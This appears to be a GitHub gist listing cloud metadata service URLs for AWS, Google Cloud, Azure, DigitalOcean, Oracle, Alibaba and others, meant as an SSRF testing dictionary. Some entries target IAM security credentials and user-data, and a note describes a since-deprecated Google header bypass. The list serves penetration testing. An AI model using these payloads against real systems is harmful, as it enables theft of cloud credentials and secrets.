Cloud Metadata Dictionary useful for SSRF Testing
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key | |
| http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key | |
| # AWS - Dirs | |
| http://169.254.169.254/ | |
| http://169.254.169.254/latest/meta-data/ | |
| http://169.254.169.254/latest/meta-data/public-keys/ | |
| ## Google Cloud | |
| # https://cloud.google.com/compute/docs/metadata | |
| # - Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" | |
| http://169.254.169.254/computeMetadata/v1/ | |
| http://metadata.google.internal/computeMetadata/v1/ | |
| http://metadata/computeMetadata/v1/ | |
| http://metadata.google.internal/computeMetadata/v1/instance/hostname | |
| http://metadata.google.internal/computeMetadata/v1/instance/id | |
| http://metadata.google.internal/computeMetadata/v1/project/project-id | |
| # Google allows recursive pulls | |
| http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true | |
| # Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn) | |
| http://metadata.google.internal/computeMetadata/v1beta1/ | |
| ## Digital Ocean | |
| # https://developers.digitalocean.com/documentation/metadata/ | |
| http://169.254.169.254/metadata/v1.json | |
| http://169.254.169.254/metadata/v1/ | |
| http://169.254.169.254/metadata/v1/id | |
| http://169.254.169.254/metadata/v1/user-data | |
| http://169.254.169.254/metadata/v1/hostname | |
| http://169.254.169.254/metadata/v1/region | |
| http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address | |
| ## Packetcloud | |
| https://metadata.packet.net/userdata | |
| ## Azure | |
| # Limited, maybe more exist? | |
| # https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/ | |
| http://169.254.169.254/metadata/v1/maintenance | |
| ## Update Apr 2017, Azure has more support; requires the header "Metadata: true" | |
| # https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service | |
| http://169.254.169.254/metadata/instance?api-version=2017-04-02 | |
| http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text | |
| ## OpenStack/RackSpace | |
| # (header required? unknown) | |
| http://169.254.169.254/openstack | |
| ## HP Helion | |
| # (header required? unknown) | |
| http://169.254.169.254/2009-04-04/meta-data/ | |
| ## Oracle Cloud | |
| http://192.0.0.192/latest/ | |
| http://192.0.0.192/latest/user-data/ | |
| http://192.0.0.192/latest/meta-data/ | |
| http://192.0.0.192/latest/attributes/ | |
| ## Alibaba | |
| http://100.100.100.200/latest/meta-data/ | |
| http://100.100.100.200/latest/meta-data/instance-id | |
| http://100.100.100.200/latest/meta-data/image-id |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
http://metadata.google.internal/computeMetadata/v1beta1/ is deprecated now and couldn't be abuse anymore to bypass the "Metadata-Flavor: Google" header requirement.😥